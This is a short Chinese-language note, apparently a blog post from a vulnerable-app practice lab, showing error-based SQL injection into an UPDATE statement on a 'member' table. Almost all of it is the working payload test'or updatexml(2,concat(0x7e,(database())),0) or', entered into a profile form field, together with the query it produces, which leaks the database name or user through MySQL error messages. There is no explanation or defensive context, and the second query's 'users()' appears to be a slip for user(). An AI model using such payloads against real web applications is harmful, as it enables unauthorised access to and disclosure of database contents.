update注入:
update member set sex='q',phonenum='test'or updatexml(2,concat(0x7e,(users())),0) or'',address='q',email='q' where username='q'
在修改用户名输入:
payload
test'or updatexml(2,concat(0x7e,(database())),0) or'
update member set sex='q',phonenum='test'or updatexml(2,concat(0x7e,(users())),0) or'',address='q',email='q' where username='q'
test'or updatexml(2,concat(0x7e,(database())),0) or'
发表评论